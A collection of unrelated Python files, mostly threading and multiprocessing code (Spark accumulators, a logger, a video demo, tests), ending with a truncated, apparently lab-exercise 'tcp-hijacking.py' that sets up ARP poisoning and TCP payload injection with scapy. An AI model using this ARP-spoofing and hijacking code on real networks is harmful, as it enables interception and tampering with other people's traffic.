execution_time = end_time - start_time
print ("Execution time(string joining using threading): %f\n" % execution_time)
# print ("Output: %s\n" % results.values())
del results
pool = Pool(processes=4)
start_time = time.time()
results = [pool.apply_async(my_function4) for p in xrange(NUM_TASKS)]
pool.close()
pool.join()
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(string joining using multiprocessing.Pool): %f\n" % execution_time)
# print ("Output: %s\n" % [x.get() for x in results])
|
TCMalloc_test.py
|
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import ufora.native.TCMalloc as TCMallocNative
import threading
import Queue
def memoryFreeingThreadLoop(queue):
while True:
element = queue.get()
if element == "exit":
return
address, event = element
TCMallocNative.freeAtAddress(address)
event.set()
class ComponentModelTest(unittest.TestCase):
def test_allocInOneThreadAndDeallocateInAnother(self):
queue = Queue.Queue()
thread = threading.Thread(target=memoryFreeingThreadLoop, args=(queue,))
thread.start()
#allocate 100 GB and free in the other thread
for ix in range(1000):
event = threading.Event()
address = TCMallocNative.mallocAndReturnAddress(100 * 1024 * 1024)
queue.put((address, event))
event.wait()
queue.put("exit")
thread.join()
def test_realloc(self):
#verify that TCMalloc accounts for resizing correctly
measurements = [TCMallocNative.getBytesUsed()]
for ix in range(10):
addr = TCMallocNative.mallocAndReturnAddress(10 * 1024 * 1024)
addr = TCMallocNative.reallocAtAddress(addr, 20 * 1024 * 1024)
measurements.append(TCMallocNative.getBytesUsed())
addr = TCMallocNative.reallocAtAddress(addr, 10 * 1024 * 1024)
addr = TCMallocNative.reallocAtAddress(addr, 5 * 1024 * 1024)
TCMallocNative.freeAtAddress(addr)
measurements.append(TCMallocNative.getBytesUsed())
self.assertTrue(
measurements[-1] < measurements[0] + 10 * 1024 * 1024,
"Expected %s to be less than 10 MB larger than %s" % (measurements[-1], measurements[0])
)
def test_strings(self):
bytes = TCMallocNative.getBytesUsed()
for ix in range(100):
s = str(ix) * 1000000
s2 = TCMallocNative.returnStringArg(s)
self.assertEqual(s, s2)
finalBytes = TCMallocNative.getBytesUsed()
self.assertTrue(finalBytes < bytes + 10000000)
|
demo.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import, division, print_function, unicode_literals
import time
from itertools import product as itr_prod
from threading import Thread
import cv2
import numpy as np
# HACK: cross py2-py3 compatible version
try:
from queue import Queue
except ImportError:
from Queue import Queue
COLORS = [tuple(p) for p in itr_prod([0, 180, 255], repeat=3)]
COLORS = COLORS[1:]
def ltwh_to__tblr(ltwh):
l, t, w, h = ltwh.tolist()
b = int(t + h)
r = int(l + w)
return t, b, l, r
def add_fps(orig, fps):
f_p_s_text = "FPS: {:.1f}".format(fps)
text_color = (255, 144, 30)
orig_h, orig_w = orig.shape[:2]
cv2.putText(orig, f_p_s_text, (10, orig_h - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, text_color, 1)
return orig
def check_range(upper, lower, checked_val):
if upper < checked_val:
checked_val = upper
elif lower > checked_val:
checked_val = lower
return checked_val
def add_rectangle(classes, orig, preds, pred_shape):
orig_h, orig_w = orig.shape[:2]
locs = [pred[:, 0:4] for pred in preds]
labels_n = np.array([pred[:, 4] for pred in preds]).astype(np.int) # TODO magic-number
labels_n = labels_n.flatten()
labels = [classes[i_label] for i_label in labels_n]
scores = preds[0][:, 5]
pred_h, pred_w = pred_shape
w_scale = orig_w / pred_w
h_scale = orig_h / pred_h
locs = (np.array(locs).reshape((-1, 4)) * [w_scale, h_scale, w_scale, h_scale]).astype(int)
for idx, loc in enumerate(locs):
t, b, le, r = ltwh_to__tblr(loc)
le = check_range(orig_w, 0, le)
r = check_range(orig_w, 0, r)
t = check_range(orig_h, 0, t)
b = check_range(orig_h, 0, b)
color_r = COLORS[labels_n[idx] % len(COLORS)]
thick = 2
label_text = "{} : {:.1f}%".format(labels[idx], scores[idx] * 100)
label_size, baseline = cv2.getTextSize(label_text, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)
cv2.rectangle(orig, (le, t), (r, b), color_r, thick)
max_color = max(color_r)
text_color = (255, 255, 255) if max_color < 255 else (0, 0, 0)
cv2_filed_config = cv2.cv.CV_FILLED if hasattr(cv2, 'cv') else cv2.FILLED
cv2.rectangle(orig, (le, t), (le + label_size[0], t + label_size[1]), color_r, cv2_filed_config)
cv2.putText(orig, label_text, (le, t + label_size[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, text_color)
return orig
class VideoStream:
def __init__(self, video_source, video_width, video_height, video_fps, queue_size=1):
self.video_fps = video_fps
vc = cv2.VideoCapture(video_source)
if hasattr(cv2, 'cv'):
vc.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, video_width)
vc.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, video_height)
vc.set(cv2.cv.CV_CAP_PROP_FPS, video_fps)
else:
vc.set(cv2.CAP_PROP_FRAME_WIDTH, video_width)
vc.set(cv2.CAP_PROP_FRAME_HEIGHT, video_height)
vc.set(cv2.CAP_PROP_FPS, video_fps)
self.stream = vc
self.stopped = False
self.queue = Queue(maxsize=queue_size)
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
def update(self):
while True:
if self.stopped:
break
(flg, frame) = self.stream.read()
if not flg:
Exception("Video capture is wrong")
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if self.queue.full():
time.sleep(1/float(self.video_fps))
else:
if not self.queue.empty():
self.queue.get()
self.queue.put(frame)
else:
self.queue.put(frame)
self.stream.release()
def read(self):
return self.queue.get()
def release(self):
self.stopped = True
self.thread.join()
def run_inference(image, nn, pre_process, post_process):
start = time.clock()
data = pre_process(image=image)["image"]
data = np.expand_dims(data, axis=0)
network_only_start = time.clock()
result = nn.run(data)
fps_only_network = 1.0/(time.clock() - network_only_start)
output = post_process(outputs=result)['outputs']
fps = 1.0/(time.clock() - start)
return output, fps, fps_only_network
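# Hypothetical composition of the helpers above (not part of the original demo):
# `nn`, `pre_process`, `post_process`, `classes` and `pred_shape` are placeholders
# for whatever the surrounding Blueoil tooling provides.
def run_demo_loop(nn, pre_process, post_process, classes, pred_shape,
                  video_source=0, width=640, height=480, fps=30):
    stream = VideoStream(video_source, width, height, fps)
    try:
        while True:
            frame = stream.read()  # RGB frame from the capture thread
            preds, fps_value, _ = run_inference(frame, nn, pre_process, post_process)
            drawn = add_rectangle(classes, frame, preds, pred_shape)
            drawn = add_fps(drawn, fps_value)
            cv2.imshow('demo', cv2.cvtColor(drawn, cv2.COLOR_RGB2BGR))
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
    finally:
        stream.release()
        cv2.destroyAllWindows()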
|
log.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import functools
import logging
import os
import sys
import threading
import time
from typing import List
import colorlog
from colorama import Fore
loggers = {}
log_config = {
'DEBUG': {
'level': 10,
'color': 'purple'
},
'INFO': {
'level': 20,
'color': 'green'
},
'TRAIN': {
'level': 21,
'color': 'cyan'
},
'EVAL': {
'level': 22,
'color': 'blue'
},
'WARNING': {
'level': 30,
'color': 'yellow'
},
'ERROR': {
'level': 40,
'color': 'red'
},
'CRITICAL': {
'level': 50,
'color': 'bold_red'
}
}
class Logger(object):
'''
    Default logger in PaddleAudio
Args:
name(str) : Logger name, default is 'PaddleAudio'
'''
def __init__(self, name: str = None):
name = 'PaddleAudio' if not name else name
self.logger = logging.getLogger(name)
for key, conf in log_config.items():
logging.addLevelName(conf['level'], key)
self.__dict__[key] = functools.partial(self.__call__, conf['level'])
self.__dict__[key.lower()] = functools.partial(
self.__call__, conf['level'])
self.format = colorlog.ColoredFormatter(
'%(log_color)s[%(asctime)-15s] [%(levelname)s]%(reset)s - %(message)s',
log_colors={key: conf['color']
for key, conf in log_config.items()})
self.handler = logging.StreamHandler()
self.handler.setFormatter(self.format)
self.logger.addHandler(self.handler)
self.logLevel = 'DEBUG'
self.logger.setLevel(logging.DEBUG)
self.logger.propagate = False
self._is_enable = True
def disable(self):
self._is_enable = False
def enable(self):
self._is_enable = True
@property
def is_enable(self) -> bool:
return self._is_enable
def __call__(self, log_level: str, msg: str):
if not self.is_enable:
return
self.logger.log(log_level, msg)
@contextlib.contextmanager
def use_terminator(self, terminator: str):
old_terminator = self.handler.terminator
self.handler.terminator = terminator
yield
self.handler.terminator = old_terminator
@contextlib.contextmanager
def processing(self, msg: str, interval: float = 0.1):
'''
Continuously print a progress bar with rotating special effects.
Args:
msg(str): Message to be printed.
interval(float): Rotation interval. Default to 0.1.
'''
end = False
def _printer():
index = 0
flags = ['\\', '|', '/', '-']
while not end:
flag = flags[index % len(flags)]
with self.use_terminator('\r'):
self.info('{}: {}'.format(msg, flag))
time.sleep(interval)
index += 1
t = threading.Thread(target=_printer)
t.start()
yield
end = True
logger = Logger()
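# Example usage (illustrative): the custom TRAIN/EVAL levels registered above are
# exposed as logger.train()/logger.eval(), and processing() animates a spinner while
# a long-running block executes. The messages below are placeholders.
if __name__ == '__main__':
    logger.info('loading dataset')
    logger.train('epoch 1, loss 0.42')
    with logger.processing('exporting model'):
        time.sleep(1)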
|
shm_multiproc.py
|
import ctypes
import numpy as np
from multiprocessing import Pipe, Process
from multiprocessing.sharedctypes import RawArray
from . import Env, Space
START, STEP, RESET, STOP, DONE = range(5)
class ShmProcEnv(Env):
def __init__(self, env, idx, shm):
super().__init__(env.id)
self._env, self.idx, self.shm = env, idx, shm
self.conn = self.w_conn = self.proc = None
def start(self):
self.conn, self.w_conn = Pipe()
self.proc = Process(target=self._run)
self.proc.start()
self.conn.send((START, None))
def step(self, act):
self.conn.send((STEP, act))
def reset(self):
self.conn.send((RESET, None))
def stop(self):
self.conn.send((STOP, None))
def wait(self):
return self.conn.recv()
def obs_spec(self):
return self._env.obs_spec()
def act_spec(self):
return self._env.act_spec()
def _run(self):
while True:
msg, data = self.w_conn.recv()
if msg == START:
self._env.start()
self.w_conn.send(DONE)
elif msg == STEP:
obs, rew, done = self._env.step(data)
for shm, ob in zip(self.shm, obs + [rew, done]):
np.copyto(dst=shm[self.idx], src=ob)
self.w_conn.send(DONE)
elif msg == RESET:
obs = self._env.reset()
for shm, ob in zip(self.shm, obs + [0, 0]):
np.copyto(dst=shm[self.idx], src=ob)
self.w_conn.send(DONE)
elif msg == STOP:
self._env.stop()
self.w_conn.close()
break
class ShmMultiProcEnv(Env):
"""
Parallel environments via multiprocessing + shared memory
"""
def __init__(self, envs):
super().__init__(envs[0].id)
self.shm = [make_shared(len(envs), s) for s in envs[0].obs_spec().spaces]
self.shm.append(make_shared(len(envs), Space((1,), name="reward")))
self.shm.append(make_shared(len(envs), Space((1,), name="done")))
self.envs = [ShmProcEnv(env, idx, self.shm) for idx, env in enumerate(envs)]
def start(self):
for env in self.envs:
env.start()
self.wait()
def step(self, actions):
for idx, env in enumerate(self.envs):
env.step([a[idx] for a in actions])
return self._observe()
def reset(self):
for e in self.envs:
e.reset()
return self._observe()
def _observe(self):
self.wait()
obs = self.shm[:-2]
reward = np.squeeze(self.shm[-2], axis=-1)
done = np.squeeze(self.shm[-1], axis=-1)
return obs, reward, done
def stop(self):
for e in self.envs:
e.stop()
for e in self.envs:
e.proc.join()
def wait(self):
return [e.wait() for e in self.envs]
def obs_spec(self):
return self.envs[0].obs_spec()
def act_spec(self):
return self.envs[0].act_spec()
def make_shared(n_envs, obs_space):
shape = (n_envs, ) + obs_space.shape
raw = RawArray(to_ctype(obs_space.dtype), int(np.prod(shape)))
return np.frombuffer(raw, dtype=obs_space.dtype).reshape(shape)
def to_ctype(_type):
types = {
np.bool: ctypes.c_bool,
np.int8: ctypes.c_byte,
np.uint8: ctypes.c_ubyte,
np.int32: ctypes.c_int32,
np.int64: ctypes.c_longlong,
np.uint64: ctypes.c_ulonglong,
np.float32: ctypes.c_float,
np.float64: ctypes.c_double,
}
if isinstance(_type, np.dtype):
_type = _type.type
return types[_type]
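# Minimal illustration (not part of the original module) of the shared-memory pattern
# that make_shared() wraps: a RawArray allocated in the parent is viewed as a numpy
# array, and writes from child processes into their slice are visible to the parent.
def _shared_block(n_envs, shape, dtype=np.float32):
    raw = RawArray(to_ctype(np.dtype(dtype)), int(np.prod((n_envs,) + shape)))
    return np.frombuffer(raw, dtype=dtype).reshape((n_envs,) + shape)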
|
accumulators.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in range(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError:...
"""
import sys
import select
import struct
if sys.version < '3':
import SocketServer
else:
import socketserver as SocketServer
import threading
from pyspark.cloudpickle import CloudPickler
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
from pyspark.accumulators import _accumulatorRegistry
accum = Accumulator(aid, zero_value, accum_param)
accum._deserialized = True
_accumulatorRegistry[aid] = accum
return accum
class Accumulator(object):
"""
A shared variable that can be accumulated, i.e., has a commutative and associative "add"
operation. Worker tasks on a Spark cluster can add values to an Accumulator with the C{+=}
operator, but only the driver program is allowed to access its value, using C{value}.
Updates from the workers get propagated automatically to the driver program.
While C{SparkContext} supports accumulators for primitive data types like C{int} and
C{float}, users can also define accumulators for custom types by providing a custom
L{AccumulatorParam} object. Refer to the doctest of this module for an example.
"""
def __init__(self, aid, value, accum_param):
"""Create a new Accumulator with a given initial value and AccumulatorParam object"""
from pyspark.accumulators import _accumulatorRegistry
self.aid = aid
self.accum_param = accum_param
self._value = value
self._deserialized = False
_accumulatorRegistry[aid] = self
def __reduce__(self):
"""Custom serialization; saves the zero value from our AccumulatorParam"""
param = self.accum_param
return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))
@property
def value(self):
"""Get the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
return self._value
@value.setter
def value(self, value):
"""Sets the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
self._value = value
def add(self, term):
"""Adds a term to this accumulator's value"""
self._value = self.accum_param.addInPlace(self._value, term)
def __iadd__(self, term):
"""The += operator; adds a term to this accumulator's value"""
self.add(term)
return self
def __str__(self):
return str(self._value)
def __repr__(self):
return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)
class AccumulatorParam(object):
"""
Helper object that defines how to accumulate values of a given type.
"""
def zero(self, value):
"""
Provide a "zero value" for the type, compatible in dimensions with the
provided C{value} (e.g., a zero vector)
"""
raise NotImplementedError
def addInPlace(self, value1, value2):
"""
Add two values of the accumulator's data type, returning a new value;
for efficiency, can also update C{value1} in place and return it.
"""
raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
"""
This handler will keep polling updates from the same socket until the
server is shutdown.
"""
def handle(self):
from pyspark.accumulators import _accumulatorRegistry
while not self.server.server_shutdown:
# Poll every 1 second for new data -- don't block in case of shutdown.
r, _, _ = select.select([self.rfile], [], [], 1)
if self.rfile in r:
num_updates = read_int(self.rfile)
for _ in range(num_updates):
(aid, update) = pickleSer._read_with_length(self.rfile)
_accumulatorRegistry[aid] += update
# Write a byte in acknowledgement
self.wfile.write(struct.pack("!b", 1))
class AccumulatorServer(SocketServer.TCPServer):
"""
A simple TCP server that intercepts shutdown() in order to interrupt
our continuous polling on the handler.
"""
server_shutdown = False
def shutdown(self):
self.server_shutdown = True
SocketServer.TCPServer.shutdown(self)
self.server_close()
def _start_update_server():
"""Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
if __name__ == "__main__":
import doctest
doctest.testmod()
|
main_yfinance.py
|
'''
Libraries
'''
# External libraries
import yfinance as yf  # Library to connect to Yahoo Finance
# Edited: added lines 286-292 in base.py of yfinance (https://github.com/ranaroussi/yfinance/issues/208)
# Edited: commented out line 319 in base.py of yfinance because of the error: self._info['regularMarketPrice'] = self._info['regularMarketOpen'] KeyError: 'regularMarketOpen'
# General Libraries
import json
import sys
import threading  # Library for threads
import time  # Library for time-related utilities
# Libraries from the project
import stock as stk
'''
Functions
'''
# Read the file with all stock symbols in the market (the file should be kept up to date, but unfortunately the API allows only one request per month)
def fileReadSymbolStocks():
f = open("Files/StockList.txt", "r")
p = json.loads(f.read())
f.close()
return p
# Create stock objects, each holding the symbol that identifies the stock and the ticker used for requests.
def creatingStocks(symbols):
    for x in symbols:
        stocks.append(stk.stock(x, yf.Ticker(x)))
'''
Get Functions
'''
# General info of a stock
def getStockInfo(stock):
return stock.getTicker().info
# Historical Market Data of a Stock
def getStockHistoricalMarketData(stock):
return stock.getTicker().history(period = "max", threads = False)
# Actions (Dividends, splits) of a stock
def getStockActions(stock):
return (stock.getTicker().actions)
# Dividends of a stock
def getStockDividends(stock):
return (stock.getTicker().dividends)
# Splits of a stock
def getStockSplits(stock):
return (stock.getTicker().splits)
# Financials of a stock
def getStockFinancials(stock):
return (stock.getTicker().financials)
# Quarterly financials of a stock
def getStockQuarterlyFinancials(stock):
return (stock.getTicker().quarterly_financials)
# Major holders of a stock
def getStockMajorHolders(stock):
return (stock.getTicker().major_holders)
# Institutional holders of a stock
def getStockInstitutionalHolders(stock):
return (stock.getTicker().institutional_holders)
# Balance sheet of a stock
def getStockBalanceSheet(stock):
return (stock.getTicker().balance_sheet)
# Quarterly balance sheet of a stock
def getStockQuarterlyBalanceSheet(stock):
return (stock.getTicker().quarterly_balance_sheet)
# Cashflow of a stock
def getStockCashFlow(stock):
return (stock.getTicker().cashflow)
# Quarterly Cashflow of a stock
def getStockQuarterlyCashFlow(stock):
return (stock.getTicker().quarterly_cashflow)
# Earnings of a stock
def getStockEarnings(stock):
return (stock.getTicker().earnings)
# Quarterly Earnings of a stock
def getStockQuarterlyEarnings(stock):
return (stock.getTicker().quarterly_earnings)
# Sustainability of a stock
def getStockSustainability(stock):
return (stock.getTicker().sustainability)
# Analysts recommendations of a stock
def getStockAnalystsRecommendations(stock):
return (stock.getTicker().recommendations)
# Next event (earnings, etc) of a stock
def getStockCalendar(stock):
return (stock.getTicker().calendar)
# get ISIN code - *experimental* of a stock
# ISIN = International Securities Identification Number
def getStock_ISIN_code(stock):
return (stock.getTicker().isin)
# get options expirations of a stock
def getStockOptions(stock):
return (stock.getTicker().options)
'''
Print to the screen Functions
'''
# Version of the Yfinance
def versionYfinance():
print('Yfinance = version = ' + yf.__version__)
''' Option chain (section still missing; a hedged sketch follows below) '''
# get the option chain for a specific expiration
# opt = msft.option_chain('YYYY-MM-DD')
# data available via: opt.calls, opt.puts
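# Hedged sketch for the missing section above (the function name is illustrative,
# not from the original file): option chain for a specific expiration date,
# following the same wrapper pattern as the other get functions.
def getStockOptionChain(stock, expiration_date):
    # expiration_date format: 'YYYY-MM-DD'; should be one of stock.getTicker().options
    opt = stock.getTicker().option_chain(expiration_date)
    # Calls and puts come back as separate pandas DataFrames
    return opt.calls, opt.puts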
# Menu options
def showMenu():
print("Menu")
print("1 - Show stock info")
print("2 - Show historical Market Data")
print("3 - Show Actions (dividends, splits)")
print("4 - Show dividends")
print("5 - Show splits")
print("6 - Show financials")
print("7 - Show major holders")
print("8 - Show Institutional holders")
print("9 - Show balance sheet")
print("10 - Show Cashflow")
print("11 - Show earnings")
print("12 - Show sustainability")
print("13 - Show analysys recommendations")
print("14 - Show next event (earnings, etc)")
print("15 - Show ISIN code")
print("Option: ")
'''
Handlers
'''
# Menu Handler
def menu():
run = True
while (run):
showMenu()
option = int(sys.stdin.readline())
if (option == 0):
run = False
exit(0)
elif (option == 1):
print("Stock Info")
print(getStockInfo(stocks[0]))
elif (option == 2):
print("Historical market data")
print(getStockHistoricalMarketData(stocks[0]))
elif (option == 3):
print("Actions (Dividends, splits)")
print(getStockActions(stocks[0]))
elif (option == 4):
print("Dividends")
print(getStockDividends(stocks[0]))
elif (option == 5):
print("Splits")
print(getStockSplits(stocks[0]))
elif (option == 6):
print("Financials")
            print(getStockFinancials(stocks[0]))
            print(getStockQuarterlyFinancials(stocks[0]))
elif (option == 7):
print("Major holders")
print(getStockMajorHolders(stocks[0]))
elif (option == 8):
print("Institutional holders")
print(getStockInstitutionalHolders(stocks[0]))
elif (option == 9):
print("Balance Sheet")
print(getStockBalanceSheet(stocks[0]))
print(getStockQuarterlyBalanceSheet(stocks[0]))
elif (option == 10):
print("Cashflow")
print(getStockCashFlow(stocks[0]))
print(getStockQuarterlyCashFlow(stocks[0]))
elif (option == 11):
print("Earnings")
print(getStockEarnings(stocks[0]))
print(getStockQuarterlyEarnings(stocks[0]))
elif (option == 12):
print("Sustainability")
print(getStockSustainability(stocks[0]))
elif (option == 13):
print("Analysys recommendations")
print(getStockAnalystsRecommendations(stocks[0]))
elif (option == 14):
print("Next event (earnings, etc)")
print(getStockCalendar(stocks[0]))
elif(option == 15):
print("ISIS code")
print(getStock_ISIN_code(stocks[0]))
else:
print("Not a valid option!")
time.sleep(5)
'''
Variables
'''
# Global Variables
stocks = [] # Array of Object's Stock
symbolStock = fileReadSymbolStocks() # All Symbol Stocks read from the file
versionYfinance()  # Print the yfinance version in use
'''
MAIN LOGIC
'''
t = threading.Thread(target=creatingStocks, args=(symbolStock,))  # Thread for creating the stock objects
t.daemon = True  # Daemon thread, so it stops when the program shuts down
t.start()  # Start the thread
menu()  # Start the menu loop
|
subprocess_server_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for the processes module."""
# pytype: skip-file
from __future__ import absolute_import
import os
import re
import shutil
import socketserver
import tempfile
import threading
import unittest
# patches unittest.TestCase to be python3 compatible
import future.tests.base # pylint: disable=unused-import
from apache_beam.utils import subprocess_server
# TODO(Py3): Use tempfile.TemporaryDirectory
class TemporaryDirectory:
def __enter__(self):
self._path = tempfile.mkdtemp()
return self._path
def __exit__(self, *args):
shutil.rmtree(self._path, ignore_errors=True)
class JavaJarServerTest(unittest.TestCase):
def test_gradle_jar_release(self):
self.assertEqual(
'https://repo.maven.apache.org/maven2/org/apache/beam/'
'beam-sdks-java-fake/VERSION/beam-sdks-java-fake-VERSION.jar',
subprocess_server.JavaJarServer.path_to_beam_jar(
'sdks:java:fake:fatJar', version='VERSION'))
self.assertEqual(
'https://repo.maven.apache.org/maven2/org/apache/beam/'
'beam-sdks-java-fake/VERSION/beam-sdks-java-fake-A-VERSION.jar',
subprocess_server.JavaJarServer.path_to_beam_jar(
'sdks:java:fake:fatJar', appendix='A', version='VERSION'))
def test_gradle_jar_dev(self):
with self.assertRaisesRegex(
Exception,
re.escape(os.path.join('sdks',
'java',
'fake',
'build',
'libs',
'beam-sdks-java-fake-VERSION-SNAPSHOT.jar')) +
' not found.'):
subprocess_server.JavaJarServer.path_to_beam_jar(
'sdks:java:fake:fatJar', version='VERSION.dev')
with self.assertRaisesRegex(
Exception,
re.escape(os.path.join('sdks',
'java',
'fake',
'build',
'libs',
'beam-sdks-java-fake-A-VERSION-SNAPSHOT.jar')) +
' not found.'):
subprocess_server.JavaJarServer.path_to_beam_jar(
'sdks:java:fake:fatJar', appendix='A', version='VERSION.dev')
def test_local_jar(self):
class Handler(socketserver.BaseRequestHandler):
timeout = 1
def handle(self):
self.request.recv(1024)
self.request.sendall(b'HTTP/1.1 200 OK\n\ndata')
port, = subprocess_server.pick_port(None)
server = socketserver.TCPServer(('localhost', port), Handler)
t = threading.Thread(target=server.handle_request)
t.daemon = True
t.start()
with TemporaryDirectory() as temp_dir:
subprocess_server.JavaJarServer.local_jar(
'http://localhost:%s/path/to/file.jar' % port, temp_dir)
with open(os.path.join(temp_dir, 'file.jar')) as fin:
self.assertEqual(fin.read(), 'data')
if __name__ == '__main__':
unittest.main()
|
tcp-hijacking.py
|
from scapy.all import ARP, TCP, send, sr, IP, Raw
import os
import sys
import threading
import time
from netfilterqueue import NetfilterQueue as NFQ
# Constants and global variables -------------------------------------------------------------------------------------------
CLIENT_IP = '172.10.0.2'
SERVER_IP = '198.10.0.2'
seq_nr_mask = dict()
seq_nr_unmask = dict()
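# seq_nr_mask maps original client-side sequence numbers to their shifted values
# after the HACK_MESSAGE bytes are injected into the stream; seq_nr_unmask does the
# reverse so that acknowledgement numbers coming back can be rewritten. Without this
# bookkeeping the two endpoints would disagree on stream offsets and drop or
# retransmit the altered segments.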
#ARP Poison parameters
gateway_ip = "198.10.0.1"
target_ip = "198.10.0.2"
packet_count = 1000
# length: 23 bytes
HACK_MESSAGE = b'You just got haxxed -> '
# End of constants and global variables -------------------------------------------------------------------------------------
# Function that takes an IP address and broadcasts an ARP request to discover
# the MAC address behind it. Returns that MAC address, or None
# if the request times out.
def get_mac(ip_address):
    # Build the ARP packet with operation code 1 (who-has)
    # and use sr (Send and Receive) to send the request and wait for the reply
response, _ = sr(ARP(op=1, pdst=ip_address), retry=2, timeout=10)
for _, packet in response:
return packet[ARP].hwsrc
return None
# Restore the network by broadcasting packets with opcode = 2 (is-at)
# carrying the real MAC addresses of the gateway and the target (the server in our case)
def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
send(ARP(op = 2, pdst = gateway_ip, hwsrc = target_mac, psrc = target_ip), count = 5)
send(ARP(op = 2, pdst = target_ip, hwsrc = gateway_mac, psrc = gateway_ip), count = 5)
# An infinite loop that broadcasts one packet misleading the network about the MAC address
# of the router, and one packet misleading it about the MAC address of the target
def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac):
print("[*] Am pornit atacul de tip ARP poison [CTRL-C pentru a opri]")
try:
while True:
